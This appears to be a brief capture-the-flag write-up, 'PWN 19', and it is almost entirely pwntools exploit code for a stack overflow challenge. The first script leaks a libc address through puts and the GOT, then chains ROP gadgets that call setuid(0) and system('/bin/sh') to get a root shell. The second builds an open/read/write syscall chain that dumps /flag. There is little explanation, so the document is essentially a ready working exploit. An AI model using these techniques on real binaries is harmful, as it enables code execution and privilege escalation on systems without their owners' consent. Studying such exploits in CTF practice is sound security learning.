PWN 19

1 min readJun 13, 2024

Leaking libc to get the flag with setuid and binsh

cyclic1 = b"\x90"*136
pop_rax = rop.find_gadget(["pop rax"])[0]
pop_rdi = rop.find_gadget(["pop rdi"])[0]
pop_rsi = rop.find_gadget(["pop rsi", "ret"])[0]
pop_rdx = rop.find_gadget(["pop rdx"])[0]
syscall = rop.find_gadget(["syscall"])[0]
ret = rop.find_gadget(["ret"])[0]
print("test")
puts_plt = e.plt.puts
main_plt = e.symbols['challenge']
puts_got = e.got.puts
symbolsPuts= e.symbols['puts']

payload =flat([
cyclic1,
p64(pop_rdi),
p64(puts_got),
p64(puts_plt),
p64(main_plt)
])
p.send(payload)
marker = b'Leaving!\n'
p.recvuntil(marker)
leaked_data = p.recv(6)
leaked_address = u64(leaked_data.ljust(8, b'\x00'))
libc.address = leaked_address - libc.symbols['puts']
print(f"Leaked address: {hex(libc.address)}")

system = libc.symbols['system']
binsh = next(libc.search(b"/bin/sh"))

payload = flat([
p64(ret),
b"\x90"*128,
p64(ret),

p64(pop_rax),
p64(0x69),
p64(pop_rdi),
p64(0x0),
p64(syscall),


p64(ret),

p64(pop_rdi),
p64(binsh),
p64(system)
])

p.send(payload)
p.interactive()

using open read write to get the flag

leak_win=p.read(16)
leak_win = leak_win.strip(b"\n")
leak_win = leak_win.strip(b".")
address_int = int(leak_win, 16)
address_int+=0x120+0x10
pop_rax = rop.find_gadget(["pop rax"])[0]
pop_rdi = rop.find_gadget(["pop rdi"])[0]
pop_rsi = rop.find_gadget(["pop rsi", "ret"])[0]
pop_rdx = rop.find_gadget(["pop rdx"])[0]
syscall = rop.find_gadget(["syscall"])[0]


payload =flat([
    cyclic1,
    #open
    p64(pop_rax),
    p64(0x2),
    p64(pop_rdi),
    p64(address_int),
    p64(pop_rsi),
    p64(0x0),
    p64(pop_rdx),
    p64(0x0),
    p64(syscall),
                                                                                                                                                                                                                                                                                                                                                    
    #open                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                    
    #read                                                                                                                                                                                                                                                                                                                                           
    p64(pop_rax),                                                                                                                                                                                                                                                                                                                                   
    p64(0x0),                                                                                                                                                                                                                                                                                                                                       
    p64(pop_rdi),                                                                                                                                                                                                                                                                                                                                   
    p64(0x3),                                                                                                                                                                                                                                                                                                                                       
    p64(pop_rdx),                                                                                                                                                                                                                                                                                                                                   
    p64(0x50),                                                                                                                                                                                                                                                                                                                                      
    p64(pop_rsi),                                                                                                                                                                                                                                                                                                                                   
    p64(address_int),                                                                                                                                                                                                                                                                                                                               
    p64(syscall),                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                    
    #read                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                    
    #write                                                                                                                                                                                                                                                                                                                                          
    p64(pop_rax),                                                                                                                                                                                                                                                                                                                                   
    p64(0x1),                                                                                                                                                                                                                                                                                                                                       
    p64(pop_rdi),
    p64(0x1),
    p64(pop_rdx),
    p64(0x50),
    p64(pop_rsi),
    p64(address_int),
    p64(syscall),

    #write

    b"/flag\x00\x00\x00"])
p.send(payload)
p.interactive()

PWN 19

Written by Nick Mckenney

No responses yet